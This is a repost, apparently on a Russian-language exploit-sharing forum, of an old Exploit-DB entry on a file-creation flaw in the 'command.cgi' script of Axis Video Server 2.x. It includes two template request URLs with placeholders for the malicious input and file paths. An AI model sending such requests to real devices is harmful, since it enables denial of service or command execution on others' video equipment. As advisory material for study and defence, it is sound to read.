Exploit Axis Communications Video Server 2.x - 'Command.cgi' File Creation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22311
Проверка EDB
  1. Пройдено
Автор
MARTIN EISZNER
Тип уязвимости
REMOTE
Платформа
CGI
CVE
N/A
Дата публикации
2003-02-28
Код:
source: https://www.securityfocus.com/bid/6987/info

It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution. 

http://www.example.com/axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=[bad input]

http://www.example.com/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name]
 
Источник
www.exploit-db.com

Похожие темы